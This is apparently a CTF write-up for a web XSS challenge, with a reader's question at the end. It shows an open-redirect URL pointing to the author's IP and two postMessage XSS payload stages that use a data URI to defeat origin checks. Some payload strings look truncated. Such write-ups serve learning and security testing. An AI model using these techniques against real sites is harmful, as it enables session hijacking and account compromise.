Tags: web xss
Rating:
I spent far too long going in the wrong direction for this task. I found an unintended vulnerability, which I thought was the solution, but this was later patched during the challenge.
### Initial (Unintended) Solution
I found that if you updated your profile information to contain an XSS payload, you could trigger a (self) XSS when visiting the home page. This combined with a CSRF exploit to update the profile information could potentially be used to gain XSS from the admin. However this vulnerability was patched before I could get the flag.
### My Actual Solution
The admin would now only visit pages coming from the challenge host. To get around this an open redirect vulnerability was found as seen below:
`http://51.15.73.163:13337/redirect.php?url=http://myip&h=341cd45197fd184ef27833a1fe316dd9`
Note `h` is the MD5 hash of the `url` value.
This challenge was also exploited using the `window.postMessage` XSS however the page now validated that the request came from the same origin. To exploit this we used a data URI XSS which has a null origin and bypasses the origin validation. This is shown below:
#### Payload Stage 1
The first payload triggers an XSS in the user's browser which then loads another JavaScript payload using the `data:URI`.
```
<script>
var call_window;
call_window = window.open("http://51.15.73.163:13336/call.php");
console.log(call_window);
setTimeout(function(){
call_window.postMessage({
type: "audio",
details: {
sender_username: "testuser2",
sender_team_name: "test",
receiver_username:"
aaaaaaa",
receiver_team_name: 'aa'
}
}, "*");
}, 1000);
</script>
```
#### Payload Stage 2
The base64 decoded payload is as follows:
```
<script>var call_window;
call_window = window.open("http://localhost/call.php");
console.log(call_window);
setTimeout(function(){
call_window.postMessage({
type: "audio",
details: {
sender_username: "testuser2",
sender_team_name: "test",
receiver_username:"
aaaaaaa",
receiver_team_name: 'aa'
}
}, "*");
}, 1000);</script>
```
".. later patched during the challenge"?
Do you mean that they modify this task during the challenge?